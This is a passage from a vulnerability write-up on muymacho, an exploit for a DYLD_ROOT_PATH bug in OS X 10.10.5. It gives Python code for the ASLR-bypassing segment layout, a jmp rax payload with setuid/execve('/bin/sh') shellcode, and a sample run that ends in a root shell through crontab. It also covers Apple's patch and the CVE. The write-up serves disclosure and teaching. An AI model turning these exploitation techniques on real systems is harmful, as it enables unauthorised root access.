The implementation section will show that muymacho uses a top down strategy. This approach ensures higher pages get replaced first followed by lower pages. The stack is lower than the dyld_target page in memory and at a safe distance. The stack is fine :)

It is possible that only some of dyld’s pages get mapped in by a segment. The rest of the pages would then be mapped in by the next segment. Does it matter? No.

The mmap system call, the wrapper function, and the majority of the parsing loop from useSimulatorDyld() are all contained in the dyld_target page. The rest of useSimulatorDyld() is on a lower page.

TLDR: everything is fine :)

Implementation

muymacho uses 32 segments to cover an address range of 0x20000000 bytes. This ensures that the entire ASLR memory range is covered. Segments will be mapped in until the dyld_target page is replaced, at which point our code takes control.

A top down strategy is used to prevent unnecessary memory corruption, in particular of the stack. The first segment uses the maximum vmaddr value. Subsequent segments use smaller values, allowing the entire range to be covered. The following graphic provides an example. Keep in mind that it is not to scale. dyld_target is one page while the segments are 4096 pages each.

memory map

Eventually dyld_target will be mapped and code execution is achieved. Once the dyld_target page is replaced, control will be instant upon the return of the mmap call.
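The top down walk can be simulated to see which segment ends up covering dyld_target for a given pair of slides. This is a sketch, not code from muymacho: first_hit is a hypothetical helper, and FIRST_VMADDR is the adjusted maximum vmaddr (0x7ffe6ec1d000) that muymacho assigns to its first segment.

```python
PAGE = 0x1000
SEGMENT_BYTES = 0x1000000
SEGMENT_COUNT = 32
FIRST_VMADDR = 0x7ffe6ec1d000  # vmaddr of the first (highest) segment


def first_hit(load_address, dyld_target):
    """Return (segment index, page index inside that segment) for the first
    segment whose mapping covers dyld_target, or None if no segment does."""
    for index in range(SEGMENT_COUNT):
        vmaddr = FIRST_VMADDR - index * SEGMENT_BYTES
        start = vmaddr + load_address  # simplified mmap_equation
        if start <= dyld_target < start + SEGMENT_BYTES:
            return index, (dyld_target - start) // PAGE
    return None


# No ASLR: addresses from the first vmmap listing.
print(first_hit(0x100009000, 0x7fff5fc26000))
# With ASLR: loadAddress and dyld base + 0x26000 from the second listing.
print(first_hit(0x102db0000, 0x7fff69b09000 + 0x26000))
```

Segments with a lower index are mapped first, so every mapping made before the hit sits above dyld_target in memory.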

Maximum vmaddr

The maximum vmaddr used in muymacho differs from what we previously calculated. The following function calculates the maximum vmaddr:

def maximum_vmaddr(segment_size):
    '''
    returns the maximum vmaddr
    
    the function assumes the base binary is 9 pages long
    as is the case for crontab giving a 
    loadAddress_min of 0x100009000
    
    if attacking other suid programs, this value should
    be adjusted. in reality a few pages here or there
    won't have a noticeable effect.
    '''
    dyld_target = 0x7fff5fc26000
    loadAddress_min = 0x100009000 
    aslr_slide_max = 0x0ffff000

    dyld_target_max = dyld_target + aslr_slide_max
    maximum_offset = dyld_target_max - loadAddress_min

    # Only one page from the payload needs to hit the maximum offset.
    vmaddr = maximum_offset - segment_size + 0x1000  

    return vmaddr

The only difference is the following portion of code:

# Only one page from the payload needs to hit the maximum offset.
    vmaddr = maximum_offset - segment_size + 0x1000

The original maximum vmaddr calculations assume we are mapping in a single page. We are actually mapping in 4096 pages at a time.

The calculation is adjusted to only map in one page at the maximum vmaddr, otherwise we are wasting pages that will never replace dyld_target.

The following graphic may help clarify the concept:

vmaddr adjust

The left hand side shows the original maximum vmaddr (0x7ffe6fc1c000) replacing the highest possible dyld_target. All the other pages are superfluous, since we are already at the maximum possible vmaddr and the highest possible dyld_target. Only one page from this segment could hit a possible dyld_target.

The right hand side uses the adjusted vmaddr (0x7ffe6ec1d000). The last page of the segment will replace the highest possible dyld_target, so all 4096 segment pages could replace possible dyld_target pages.

Payload

The Bypassing ASLR section ensures a segment will be mapped over dyld_target. The payload is 0x1000000 bytes, or 4096 pages, in total. One of those pages will replace the dyld_target page.

The dyld mmap system call is shown again below.

00007FFF5FC26DBC ___mmap   proc near               ; CODE XREF: _mmap+31p
00007FFF5FC26DBC           mov     eax, 20000C5h
00007FFF5FC26DC1           mov     r10, rcx
00007FFF5FC26DC4           syscall
00007FFF5FC26DC6           jnb     short locret_7FFF5FC26DD0

When the mmap system call returns, execution will continue at offset 0xdc6 in the page. Since rax is used as a return value, it will contain the base address of the newly mapped memory. In other words, rax points to the start of our payload.

All 4096 payload pages contain a jmp rax at offset 0xdc6. The first page at the base of the payload also contains the shellcode at offset 0.

The following diagram shows the base page and a standard page.

payload pages

Regardless of which page lines up with dyld_target, the jmp rax instruction will be executed leading to the shellcode.
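The page layout can be sketched as follows. This is an illustration of the layout only, not muymacho's code: build_payload is a hypothetical helper, and the int3 bytes are a harmless placeholder where the real shellcode would go. FF E0 is the x86_64 encoding of jmp rax.

```python
PAGE = 0x1000
PAGE_COUNT = 4096
RETURN_OFFSET = 0xdc6       # where execution resumes after the mmap syscall
JMP_RAX = b"\xff\xe0"       # x86_64 encoding of `jmp rax`


def build_payload(base_code):
    """Lay out PAGE_COUNT pages, each with `jmp rax` at RETURN_OFFSET,
    and place base_code at offset 0 of the first page."""
    if len(base_code) > RETURN_OFFSET:
        raise ValueError("base page code would overlap the jmp rax")
    page = bytearray(PAGE)
    page[RETURN_OFFSET:RETURN_OFFSET + len(JMP_RAX)] = JMP_RAX
    payload = bytearray(bytes(page) * PAGE_COUNT)
    payload[:len(base_code)] = base_code
    return bytes(payload)


payload = build_payload(b"\xcc" * 16)  # int3 placeholder, not real shellcode
print(hex(len(payload)))
```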

The shellcode then performs a setuid(0) system call followed by an execve(‘/bin/sh’) system call.

Finished exploit

This section combines everything we’ve figured out thus far. In summary:

  • Our goal is to remap dyld_target, which is the page containing the mmap system call within dyld
  • We use 32 segments spanning 0x20000000 bytes to bypass ASLR
    • We implement a top down strategy
    • The first segment has a vmaddr of 0x7ffe6ec1d000
    • Each subsequent segment has a vmaddr 0x1000000 lower than the previous one
  • All the segments point to the same 4096 pages of payload
    • All pages contain a jmp rax instruction at offset 0xdc6
    • The base page contains our shellcode
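The top down segment layout from this summary can be reproduced with a short sketch. The constants come from the text; the variable names are illustrative and this is not the loop used in muymacho itself.

```python
SEGMENT_COUNT = 32
SEGMENT_SIZE = 0x1000000
FIRST_VMADDR = 0x7ffe6ec1d000

# Top down: each segment sits 0x1000000 below the previous one.
vmaddrs = [FIRST_VMADDR - i * SEGMENT_SIZE for i in range(SEGMENT_COUNT)]

for index, vmaddr in enumerate(vmaddrs):
    print("segment 0x%02x    vm_addr: 0x%x" % (index, vmaddr))

covered = SEGMENT_COUNT * SEGMENT_SIZE
print(hex(covered))  # 0x20000000
```

The lowest segment ends up at 0x7ffe4fc1d000, and together the 32 segments cover the 0x20000000 bytes needed to bypass ASLR.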

muymacho is written in Python and is available on GitHub. There is a very minimal Mach-O implementation in the MachoFile and LC_SEGMENT_64 classes. They create a dyld_sim file containing 32 segments, all pointing to the payload.
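For readers unfamiliar with the load command format, here is a rough sketch of how a single LC_SEGMENT_64 command can be packed in Python. The field layout follows segment_command_64 from <mach-o/loader.h>; the function name, segment name, file offset, and protection values are assumptions for illustration and are not taken from the muymacho classes.

```python
import struct

LC_SEGMENT_64 = 0x19
VM_PROT_READ = 0x1
VM_PROT_EXECUTE = 0x4

# cmd, cmdsize, segname[16], vmaddr, vmsize, fileoff, filesize,
# maxprot, initprot, nsects, flags (little-endian, 72 bytes total)
SEGMENT_COMMAND_64 = struct.Struct("<II16sQQQQiiII")


def pack_segment(segname, vmaddr, size, fileoff, prot):
    """Pack one section-less LC_SEGMENT_64 command."""
    return SEGMENT_COMMAND_64.pack(
        LC_SEGMENT_64,
        SEGMENT_COMMAND_64.size,  # cmdsize: no sections follow
        segname,                  # padded with NULs to 16 bytes
        vmaddr,
        size,                     # vmsize
        fileoff,
        size,                     # filesize
        prot,                     # maxprot
        prot,                     # initprot
        0,                        # nsects
        0,                        # flags
    )


# Hypothetical values: segment name, file offset, and protections are guesses.
command = pack_segment(b"__SEG00", 0x7ffe6ec1d000, 0x1000000, 0x1000,
                       VM_PROT_READ | VM_PROT_EXECUTE)
print(len(command))  # 72
```

Pointing every segment at the same payload would mean reusing the same fileoff in each command while only the vmaddr changes.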

muymacho is passed a base directory and will create the necessary directory structure and dyld_sim file. The actual exploitation requires setting DYLD_ROOT_PATH to the base directory and executing a suid binary. A sample run is shown below.

user@yosemite:~/tmp$ python muymacho.py ~/tmp
muymacho.py - exploit for DYLD_ROOT_PATH vuln in OS X 10.10.5
Luis Miras @_luism

[+] using base_directory: /Users/user/tmp
[+] creating dir: /Users/user/tmp/usr/lib
[+] creating macho file: /Users/user/tmp/usr/lib/dyld_sim
    LC_SEGMENT_64: segment 0x00    vm_addr: 0x7ffe6ec1d000
    LC_SEGMENT_64: segment 0x01    vm_addr: 0x7ffe6dc1d000
    LC_SEGMENT_64: segment 0x02    vm_addr: 0x7ffe6cc1d000
    LC_SEGMENT_64: segment 0x03    vm_addr: 0x7ffe6bc1d000
    LC_SEGMENT_64: segment 0x04    vm_addr: 0x7ffe6ac1d000
    LC_SEGMENT_64: segment 0x05    vm_addr: 0x7ffe69c1d000
    LC_SEGMENT_64: segment 0x06    vm_addr: 0x7ffe68c1d000
    LC_SEGMENT_64: segment 0x07    vm_addr: 0x7ffe67c1d000
    LC_SEGMENT_64: segment 0x08    vm_addr: 0x7ffe66c1d000
    LC_SEGMENT_64: segment 0x09    vm_addr: 0x7ffe65c1d000
    LC_SEGMENT_64: segment 0x0a    vm_addr: 0x7ffe64c1d000
    LC_SEGMENT_64: segment 0x0b    vm_addr: 0x7ffe63c1d000
    LC_SEGMENT_64: segment 0x0c    vm_addr: 0x7ffe62c1d000
    LC_SEGMENT_64: segment 0x0d    vm_addr: 0x7ffe61c1d000
    LC_SEGMENT_64: segment 0x0e    vm_addr: 0x7ffe60c1d000
    LC_SEGMENT_64: segment 0x0f    vm_addr: 0x7ffe5fc1d000
    LC_SEGMENT_64: segment 0x10    vm_addr: 0x7ffe5ec1d000
    LC_SEGMENT_64: segment 0x11    vm_addr: 0x7ffe5dc1d000
    LC_SEGMENT_64: segment 0x12    vm_addr: 0x7ffe5cc1d000
    LC_SEGMENT_64: segment 0x13    vm_addr: 0x7ffe5bc1d000
    LC_SEGMENT_64: segment 0x14    vm_addr: 0x7ffe5ac1d000
    LC_SEGMENT_64: segment 0x15    vm_addr: 0x7ffe59c1d000
    LC_SEGMENT_64: segment 0x16    vm_addr: 0x7ffe58c1d000
    LC_SEGMENT_64: segment 0x17    vm_addr: 0x7ffe57c1d000
    LC_SEGMENT_64: segment 0x18    vm_addr: 0x7ffe56c1d000
    LC_SEGMENT_64: segment 0x19    vm_addr: 0x7ffe55c1d000
    LC_SEGMENT_64: segment 0x1a    vm_addr: 0x7ffe54c1d000
    LC_SEGMENT_64: segment 0x1b    vm_addr: 0x7ffe53c1d000
    LC_SEGMENT_64: segment 0x1c    vm_addr: 0x7ffe52c1d000
    LC_SEGMENT_64: segment 0x1d    vm_addr: 0x7ffe51c1d000
    LC_SEGMENT_64: segment 0x1e    vm_addr: 0x7ffe50c1d000
    LC_SEGMENT_64: segment 0x1f    vm_addr: 0x7ffe4fc1d000
[+] building payload
[+] dyld_sim successfully created

To exploit enter:
  DYLD_ROOT_PATH=/Users/user/tmp crontab

user@yosemite:~/tmp$ DYLD_ROOT_PATH=/Users/user/tmp crontab
bash-3.2#

Patch

El Capitan made many changes to dyld. In particular, the validation of the dyld_sim file is much stricter, closing the vulnerability muymacho uses. There are various checks to ensure that consecutive segments have appropriate fileoff and vmaddr values.

At the time of this post, Apple has not yet released El Capitan source code. The changes can be examined in IDA Pro.

Conclusion

This concludes the majority of the post (be sure to check out the super sekret debug shellcode). We’ve discussed a vulnerability from discovery, through potential problems, to exploitation. The complete exploit is on GitHub.

I hope this post has been helpful. It was a fun bug and I very much enjoyed writing muymacho.

Thanks to everyone (Pete Markowsky, Ian Melven, Josha Bronson) who reviewed this post. Also thanks to @i0n1c for posting his challenge, which led to finding this bug.

super sekret debug shellcode

Sometimes I am curious as to which segment was used in exploitation as well as the various ASLR addresses. In practice, the actual addresses are irrelevant. I included a debug shellcode that provides this information back to the user.

The super sekret debug shellcode is selected by passing a “-d” command line switch. After muymacho returns with the hashtag symbol (aka #), be sure to type in:

echo "$MUYMACHO"

debug infoz

Feel free to take a look at the debug shellcode in muymacho. Debug information is passed through the execve call in an environment variable.

Appendix

10.10.4 and prior

Mac OS X 10.10.4 and prior have an additional DYLD_ROOT_PATH vector. This section discusses the older vector and the 10.10.5 update. OS X 10.10.4 uses dyld.cpp from dyld-353.2.1.

Early in the useSimulatorDyld() code, there is a check to verify that dyld_sim is owned by root.

   // verify simulator dyld file is owned by root
   struct stat sb;
   if ( fstat(fd, &sb) == -1 )
      return 0;
   if ( sb.st_uid != 0 )
      return 0;

While auditing the function, it becomes apparent that the code signing requirement is optional. Thus, the only requirement is a root-owned dyld_sim, which does not need to be signed. That isn’t a high barrier: useSimulatorDyld() will gladly load and execute it.

10.10.5 update

The 10.10.5 update brought fixes for the DYLD_PRINT_TO_FILE vulnerability (CVE-2015-3760, credited to beist of grayhash and Stefan Esser). It also included changes to the useSimulatorDyld() function, likely due to the discovery of the previous vector.

dyld_sim no longer needs to be owned by root; however, code signing is now mandatory. The following code snippet is from dyld.cpp.

   int result = fcntl(fd, F_ADDFILESIGS_FOR_DYLD_SIM, &siginfo);
   if ( result == -1 ) {
      dyld::log("fcntl(F_ADDFILESIGS_FOR_DYLD_SIM) failed with errno=%d\n", errno);
      return 0;
   }

A new fcntl command was added in 10.10.5 specifically for dyld_sim. The following excerpt is from /usr/include/sys/fcntl.h.

#define F_ADDFILESIGS_FOR_DYLD_SIM 83   /* Add signature from same file, only if it is signed by Apple (used by dyld for simulator) */

dyld_sim needs to be signed by Apple; a developer certificate is not sufficient.

CVE number

It is somewhat unclear what CVE number this bug has been assigned. The El Capitan security update lists the following bug credited to beist:

Dev Tools

Available for: Mac OS X v10.6.8 and later

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue existed in dyld. This was addressed through improved memory handling.

CVE-ID

CVE-2015-5876 : beist of grayhash

The same CVE is also listed in the iOS 9 and watchOS 2 updates. A cursory examination of dyld from iOS 8.4.1 did not reveal the vulnerability that muymacho exploits. I could be mistaken and will update this post if that is the case.